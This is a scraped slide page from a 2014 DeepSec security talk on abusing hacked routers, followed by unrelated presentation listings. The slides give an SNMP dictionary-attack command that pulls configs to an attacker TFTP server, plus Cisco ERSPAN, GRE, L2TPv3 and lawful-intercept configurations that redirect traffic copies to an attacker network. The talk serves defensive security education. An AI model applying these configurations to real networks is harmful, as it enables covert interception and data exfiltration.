bending and twisting networks deepsec 2014
play

Bending and Twisting Networks DeepSec 2014 Paul Coggin Senior - PowerPoint PPT Presentation

Jun 14, 2023 •147 likes •366 views

UNCLASSIFIED UNCLASSIFIED Bending and Twisting Networks DeepSec 2014 Paul Coggin Senior Principal Cyber Security Analyst paul.coggin@dynetics.com @PaulCoggin www.dynetics.com 1 1 V100230_Faint V## Goes Here 0000-00-yymm UNCLASSIFIED

  1. UNCLASSIFIED UNCLASSIFIED Bending and Twisting Networks DeepSec 2014 Paul Coggin Senior Principal Cyber Security Analyst paul.coggin@dynetics.com @PaulCoggin www.dynetics.com 1 1 V100230_Faint V## Goes Here 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  2. UNCLASSIFIED UNCLASSIFIED SNMP Blow Defeat SNMP w/ ACL $ snmpblow.pl -s <NetMgt IP> -d <Target IP> -t <TFTP IP> -f cfg.txt < communities.txt Attacker Network Target Network Internet SNMP Dictionary Attack with IP spoof R&S SNMP ACL Filtered Upon guessing the SNMP Trusted TFTP community string the configuration Device Server file is downloaded to the attacker TFTP server Layer 2 and L3 Anti-spoof protection with a complex SNMP community string is recommended. SNMPv3 is highly encouraged. Reference: http://www.scanit.be/en_US/snmpblow.html 2 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  3. UNCLASSIFIED UNCLASSIFIED Policy Routing Override IP Routing Table ¡ ISP A Internet ISP B -Comprised ¡ ¡ A Route Map can over ride IP routing table and redirect specific traffic flows Scenario 1 – Redirect Outbound Internet Rouge Scenario 2 – Redirect Traffic of interest 4G router out 4G or other RF network for undetected exfiltration Scenario 3 – Redirect Traffic of interest to Si Si enable a layer 3 Man in the Middle Attack ¡ Vlan 2 ¡ Vlan 3 Vlan 4 Attacker System ¡ - Packet Sniffer - IP Forwarding ¡ Reference http://ptgmedia.pearsoncmg.com/images/1587052024/samplechapter/1587052024content.pdf ¡ 3 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  4. UNCLASSIFIED UNCLASSIFIED GRE Tunnel Utilized to Sniff Across WAN Target Network Attacker Network ¡ Hacked Router Internet ¡ ¡ Packet Analyzer - GRE Tunnel is configured on the hacked router and the attacker’s router ¡ - GRE Tunnel interfaces must be in common subnet - Configure ACL to define traffic of interest on the hacked router ¡ - Define a route map with the ACL and set the next hop to the attacker’s GRE tunnel interface IP address - Similarly define an ACL & route map on the attacker router to redirect traffic to the packet analyzer ¡ ¡ Reference: http://www.symantec.com/connect/articles/cisco-snmp-configuration-attack-gre-tunnel ¡ 4 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  5. UNCLASSIFIED UNCLASSIFIED ERSPAN Enable Packet Capture Across Routed Network Target Network Attacker Network Hacked Router Internet Exfiltration of packet captures ERSPAN sends traffic over a GRE tunnel Packet Analyzer monitor session < session ID > type erspan-source monitor session < session ID > type erspan-destination source interface GigabitEthernet1/0/1 rx Source source interface GigabitEthernet1/0/2 tx ip address < source IP > source interface GigabitEthernet1/0/3 both erspan-id < erspan-flow-ID > destination destination interface GigabitEthernet2/0/1 erspan-id < erspan-flow-ID > ip address < remote ip > origin ip address < source IP > References : http://www.cisco.com/en/US/docs/ios/ios_xe/lanswitch/configuration/guide/span_xe.pdf 5 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  6. UNCLASSIFIED UNCLASSIFIED DLSw Overview IBM Mainframe or AS 400 IBM Controller SDLC IPv4 Routed Backbone dlsw local-peer peer-id 192.168.2.1 dlsw remote-peer 0 tcp 192.168.3.1 dlsw bridge-group 1 ! interface Serial0/0 Ip address 192.168.1.2 255.255.255.0 ! interface Ethernet0/0 dlsw local-peer peer-id 192.168.3.1 ip address 192.168.2.1 255.255.255.0 dlsw remote-peer 0 tcp promiscuous ! dlsw bridge-group 1 interface Serial0/1 ! description IBM controller configuration Interface serial0/0 no ip address Ip address 192.168.1.1 255.255.255.0 no ip directed-broadcast ! encapsulation sdlc interface ethernet 0/0 no keepalive ip address 192.168.3.1 255.255.255.0 clockrate 56000 bridge-group 1 sdlc role prim-xid-poll ! sdlc vmac 0030.0000.8100 bridge 1 protocol ieee sdlc address C0 DLSw is used to tunnel SNA sdlc partner 4000.80c0.4040 C0 sdlc dlsw C0 and Netbios over IP ! bridge 1 protocol ieee References: http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a0080093ece.shtml http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a00801434cd.shtml?referring_site=smartnavRD 6 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  7. UNCLASSIFIED UNCLASSIFIED Tunnel IPv6 over IPv4 using DLSw If a router can be compromised with software that supports DLSw a host may be able to tunnel IPv6 traffic across the IPv4 routed Internet. This is not a documented or supported capability by Cisco. IPv4 Routed Backbone dlsw local-peer peer-id 192.168.3.1 dlsw local-peer peer-id 192.168.2.1 dlsw remote-peer 0 tcp promiscuous dlsw remote-peer 0 tcp 192.168.3.1 dlsw bridge-group 1 dlsw bridge-group 1 ! ! Interface serial0/0 interface Serial0/0 Ip address 192.168.1.1 Ip address 192.168.1.2 255.255.255.0 255.255.255.0 ! ! interface FastEthernet0/0 Interface FastEthernet 0/0 ip address 192.168.2.1 255.255.255.0 ip address 192.168.3.1 255.255.255.0 bridge-group 1 bridge-group 1 ! ! ! bridge 1 protocol ieee bridge 1 protocol ieee References: http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a0080093ece.shtml http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a00801434cd.shtml?referring_site=smartnavRD 7 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  8. UNCLASSIFIED UNCLASSIFIED L2TPv3 Overview Pseudo-wire ¡ Layer 2 Connection Across Service Provider WAN ¡ ¡ L2TPv3 Tunnel CE PE P PE CE Tunnel DSL PPPoE Subscribers Across the Service Provider Infrastructure for Termination at a Third Party Service Provider – Wholesale DSL Busiess Model ¡ ¡ ¡ ¡ ¡ 8 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  9. UNCLASSIFIED UNCLASSIFIED L2TPv3 MITM Across the Internet Target Network Attacker Network ¡ PE PE Hacked Router Internet 2.2.2.2 ¡ ¡ 1.1.1.1 L2TPv3 Tunnel ARP Poison across the Internet Common Layer 2 Network l2tp-class l2tp-defaults l2tp-class l2tp-defaults retransmit initial retries 30 retransmit initial retries 30 cookie-size 8 cookie-size 8 pseudowire-class ether-pw pseudowire-class ether-pw encapsulation l2tpv3 encapsulation l2tpv3 ¡ protocol none protocol none ip local interface Loopback0 ip local interface Loopback0 interface Ethernet 0/0 interface Ethernet 0/0 ¡ xconnect 2.2.2.2 123 encapsulation l2tpv3 manual pw-class ether-pw xconnect 1.1.1.1 123 encapsulation l2tpv3 manual pw-class ether-pw l2tp id 222 111 l2tp id 222 111 ¡ l2tp cookie local 4 54321 l2tp cookie local 4 54321 l2tp cookie remote 4 12345 l2tp cookie remote 4 12345 l2tp hello l2tp-defaults l2tp hello l2tp-defaults ¡ Reference: http://www.cisco.com/en/US/docs/ios-xml/ios/wan_lserv/configuration/xe-3s/asr1000/wan-l2-tun-pro-v3-xe.pdf ¡ 9 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  10. UNCLASSIFIED UNCLASSIFIED Lawful Intercept Overview Voice-Call Agent Configuration Data-Radius, AAA Commands LI Administration Function Law Enforcement Agency (LEA) Intercepting Request Mediation Collection Control Element IRI Device Function (ICE) Request Content Router \ Switch Mediation Device Service Provider UDP Transport SNMPv3 for Delivery Reference : http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/lawful/intercept/65LI.pdf http://www.cisco.com/en/US/docs/routers/asr9000/software/asr9k_r4.1/security/configuration/guide/syssec_cg41asr9k_chapter3.pdf 10 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  11. UNCLASSIFIED UNCLASSIFIED Lawful Intercept Identify Physical Source of Traffic DHCP request DHCP request with sub ID in Option identifier (RFC 3046) DHCP response with IP address Ethernet MAC A Access Domain MAC B ISP IP DSL DSLAM PE-AGG DHCP CPE Server MAC C ADSL L3VPN-PE modem Example Enterprise Network DHCP with Option 82 Support DHCP Option 82 provides the DSLAM and Switch Name and the Physical Interface That Requested a DHCP IP Address 11 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

  12. UNCLASSIFIED UNCLASSIFIED Lawful Intercept Exploit Scenario Target Network Destination Network ¡ Hacked Router Internet ¡ ¡ Attacker Network LI SNMP Trap Duplicate Copy of All Packets of Interest Packet Analyzer Snmp-server view < view-name > ciscoTap2MIB included ¡ Snmp-server view < view-name > ciscoIpTapMIB included Snmp-server group < group-name > v3 auth read < view-name> write <view-name) notify < view-name> ¡ Snmp-server host < ip-address > traps version 3 priv < username > udp-port < port-number> Snmp-server user < mduser-id> <groupname> v3 auth md5 < md-password> ¡ References : ¡ http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/lawful/intercept/65LI.pdf http://www.cisco.com/en/US/docs/routers/asr9000/software/asr9k_r4.1/security/configuration/guide/syssec_cg41asr9k_chapter3.pdf ¡ 12 V100230_Faint 0000-00-yymm UNCLASSIFIED Information Engineering Solutions

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Bending and Twisting Networks BSides Vienna 2014 Paul Coggin Senior Principal Cyber Security

Bending and Twisting Networks BSides Vienna 2014 Paul Coggin Senior Principal Cyber Security

UNCLASSIFIED UNCLASSIFIED Bending and Twisting Networks BSides Vienna 2014 Paul Coggin Senior Principal Cyber Security Analyst paul.coggin@dynetics.com @PaulCoggin www.dynetics.com 1 1 V100230_Faint V## Goes Here 0000-00-yymm

442 views • 21 slides
Introduction and applications Bending &amp; twisting rigidity of DNA with Magnetic Traps. What

Introduction and applications Bending &amp; twisting rigidity of DNA with Magnetic Traps. What

Introduction and applications Bending &amp; twisting rigidity of DNA with Magnetic Traps. What we will learn today Magnetic particle Magnetic Traps Tuesday: DNA: Want to twist it and compact it. --Essential for life. (1m 5 m;

118 views • 11 slides
A Blend of Stretching and Bending in Liquid Crystal Networks Epifanio G. Virga Department of

A Blend of Stretching and Bending in Liquid Crystal Networks Epifanio G. Virga Department of

A Blend of Stretching and Bending in Liquid Crystal Networks Epifanio G. Virga Department of Mathematics University of Pavia Italy eg.virga@unipv.it Summary Nematic Elastomers and Networks Neo-Classical Energy Stretching Energy Bending

850 views • 27 slides
Mapping wi fj networks and triggering on interesting traf fj c patterns (DeepSec 2018) Caleb

Mapping wi fj networks and triggering on interesting traf fj c patterns (DeepSec 2018) Caleb

Mapping wi fj networks and triggering on interesting traf fj c patterns (DeepSec 2018) Caleb Madrigal Website: http:/ /calebmadrigal.com/ Twitter: @caleb_madrigal Ham call sign: w0hak I was into &quot;IoT&quot; before I knew it was called IoT

589 views • 30 slides
Twisting and Turning Through th the ADA: ADA One Size Does Not Fit All One Size Does Not Fit

Twisting and Turning Through th the ADA: ADA One Size Does Not Fit All One Size Does Not Fit

Twisting and Turning Through th the ADA: ADA One Size Does Not Fit All One Size Does Not Fit All March 13, 2014 , Fred J. Bissinger Total Number of Charges Filed arges Filed 100000 tal Number of Ch 90000 Tot 80000 70000 1999 2000

798 views • 66 slides
Social Authentication: Vulnerabilities, Mitigations, and Redesign Marco Lancini DEEPSEC 2014

Social Authentication: Vulnerabilities, Mitigations, and Redesign Marco Lancini DEEPSEC 2014

Social Authentication: Vulnerabilities, Mitigations, and Redesign Marco Lancini DEEPSEC 2014 November 21 2 About 2013 - M.Sc. in Engineering of Computing Systems @ Computer Security Group This talk is based on my M.Sc. Thesis

664 views • 49 slides
Section 15: Introduction to Stress and Bending 15-1 Bending Bending Long bones: beams

Section 15: Introduction to Stress and Bending 15-1 Bending Bending Long bones: beams

Section 15: Introduction to Stress and Bending 15-1 Bending Bending Long bones: beams Long bones: beams T Compressive stress: inner portion p Tensile stress: outer C p portion axis i Max stresses near the edges,

429 views • 24 slides
Validity of bending tests on strip-shaped specimens to derive bending strength and stiffness

Validity of bending tests on strip-shaped specimens to derive bending strength and stiffness

The Future of Quality Control for Wood &amp; Wood Products, 4-7 th May 2010, Edinburgh The Final Conference of COST Action E53 Validity of bending tests on strip-shaped specimens to derive bending strength and stiffness properties of

277 views • 11 slides
Bending Stress Lecture 3 ME EN 372 Andrew Ning aning@byu.edu Outline Axial Stress Bending

Bending Stress Lecture 3 ME EN 372 Andrew Ning aning@byu.edu Outline Axial Stress Bending

Bending Stress Lecture 3 ME EN 372 Andrew Ning aning@byu.edu Outline Axial Stress Bending Stress Axial Stress F x = F A A Bending Stress Pure Bending M z M z M z M z M z y M z y y M z M z y ZZ y 2 dA I z = A M z I z x y

118 views • 9 slides
Induction bending provides a cost effective and more sustainable alternative to traditional pipe

Induction bending provides a cost effective and more sustainable alternative to traditional pipe

Induction bending provides a cost effective and more sustainable alternative to traditional pipe spool fabrication. NIRAS handles bending of pipes in the outer diameter range: to 20 Laboratory: Microstructural analysis Hardness

417 views • 26 slides
Plywood and Wood Bending Jesse - Kalob - Evan Content Plywood and Wood bending History

Plywood and Wood Bending Jesse - Kalob - Evan Content Plywood and Wood bending History

Plywood and Wood Bending Jesse - Kalob - Evan Content Plywood and Wood bending History Concepts Techniques - Laminated - steam 2-sided forms (industrial process) vs 1-sided forms (vacuum forming) History all over the World Used in

706 views • 15 slides
The Smooth Rectangular Peg Problem Kyle Hayden September 23, 2020 Topology Topology concerns

The Smooth Rectangular Peg Problem Kyle Hayden September 23, 2020 Topology Topology concerns

The Smooth Rectangular Peg Problem Kyle Hayden September 23, 2020 Topology Topology concerns the properties of objects/spaces that are preserved un- der continuous deformations, such as stretching, twisting, crumpling and bending, but not

242 views • 20 slides
Twisting the Lions Tail Clevelands intervention into the Venezuelan boundary dispute

Twisting the Lions Tail Clevelands intervention into the Venezuelan boundary dispute

Twisting the Lions Tail Clevelands intervention into the Venezuelan boundary dispute was his most controversial foreign policy decision. The Maine, 1898 McKinley measures an overweight Uncle Sam for larger clothing;

487 views • 21 slides
2 https://www.youtube.com/ watch?v=kfOqmSXDAD8 3 Gentrification is a tongue-twisting word,

2 https://www.youtube.com/ watch?v=kfOqmSXDAD8 3 Gentrification is a tongue-twisting word,

2 https://www.youtube.com/ watch?v=kfOqmSXDAD8 3 Gentrification is a tongue-twisting word, and its meaning is just as complex. Gentrification is when a low-income or deteriorating neighborhood is revitalized. Local governments , real estate

756 views • 17 slides
to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection

to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection

Fake Antivirus- Journey from Trojan to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection Vectors Packer Evolution How do they work ? DeepSec 2011 Introduction Fake AntiVirus (FakeAV) is a

794 views • 51 slides
periodic plates The Bending-Gradient theory for laminates and in-plane publics ou privs.

periodic plates The Bending-Gradient theory for laminates and in-plane publics ou privs.

HAL Id: cel-01266716 scientifjques de niveau recherche, publis ou non, Arthur Lebe. The Bending-Gradient theory for laminates and in-plane periodic plates. Doctoral. To cite this version: Arthur Lebe periodic plates The Bending-Gradient

1.57k views • 155 slides
Network Security ICMP, TCP, DNS, Scanning Marcus Bendtsen, Andrei Gurtov Institutionen fr

Network Security ICMP, TCP, DNS, Scanning Marcus Bendtsen, Andrei Gurtov Institutionen fr

Network Security ICMP, TCP, DNS, Scanning Marcus Bendtsen, Andrei Gurtov Institutionen fr Datavetenskap (IDA) Avdelningen fr Databas- och Informationsteknik (ADIT) Agenda A couple of examples of network protocols that did not have

400 views • 29 slides
CORS (In)Security HackInBo Winter Edition - Bologna, 27 Ottobre 2018 2 _ ABOUT Davide Danelon

CORS (In)Security HackInBo Winter Edition - Bologna, 27 Ottobre 2018 2 _ ABOUT Davide Danelon

CORS (In)Security HackInBo Winter Edition - Bologna, 27 Ottobre 2018 2 _ ABOUT Davide Danelon Founder &amp; CEO @ BeDefended MSc. in Computer Engineering CCSK, GWAPT, Comptia Security+, CCNA OWASP Testing Guide

1.03k views • 43 slides
Kernel Self Protection Kernel Summit 2016, Santa Fe Kees (Case) Cook keescook@chromium.org

Kernel Self Protection Kernel Summit 2016, Santa Fe Kees (Case) Cook keescook@chromium.org

Kernel Self Protection Kernel Summit 2016, Santa Fe Kees (Case) Cook keescook@chromium.org @kees_cook http://kernsec.org/wiki/index.php/Kernel_Self_Protection_Project http://www.openwall.com/lists/kernel-hardening/

494 views • 21 slides
The Ignorance towards Embedded Systems

The Ignorance towards Embedded Systems

The Ignorance towards Embedded Systems Felix FX Lindner, Fabian fabs Yamaguchi, Recurity Labs GmbH 22 nd FIRST Conference, Miami Your Other Network

651 views • 44 slides
Hands-On Ethical hacking and Network Defense -2 nd Edition Chapter 4 Summary - Footprinting and

Hands-On Ethical hacking and Network Defense -2 nd Edition Chapter 4 Summary - Footprinting and

Hands-On Ethical hacking and Network Defense -2 nd Edition Chapter 4 Summary - Footprinting and Social Engineering Objectives After reading this chapter and completing the exercises, you will be able to: Use Web tools for footprinting

213 views • 6 slides
Securing PHP Applications By: Ilia Alshanetsky What is Security? Security is a measurement, not

Securing PHP Applications By: Ilia Alshanetsky What is Security? Security is a measurement, not

Securing PHP Applications By: Ilia Alshanetsky What is Security? Security is a measurement, not a characteristic. It s is also an growing problem that requires an continually evolving solution. A good measure of secure application is it

782 views • 74 slides
A scientific approach to fighting web-based cybercrime Tyler Moore Tandy School of Computer

A scientific approach to fighting web-based cybercrime Tyler Moore Tandy School of Computer

A scientific approach to fighting web-based cybercrime Tyler Moore Tandy School of Computer Science University of Tulsa Based on joint work with Nicolas Christin, Nektarios Leontiadis (Carnegie Mellon), John Wadleigh (SMU) and Marie Vasek (TU)

542 views • 35 slides
What is PBIS? Process for crea2ng safer and more

What is PBIS? Process for crea2ng safer and more

What is PBIS? Process for crea2ng safer and more effec2ve schools A Systems approach to enhance capacity of schools to promote posi2ve

181 views • 7 slides

More recommend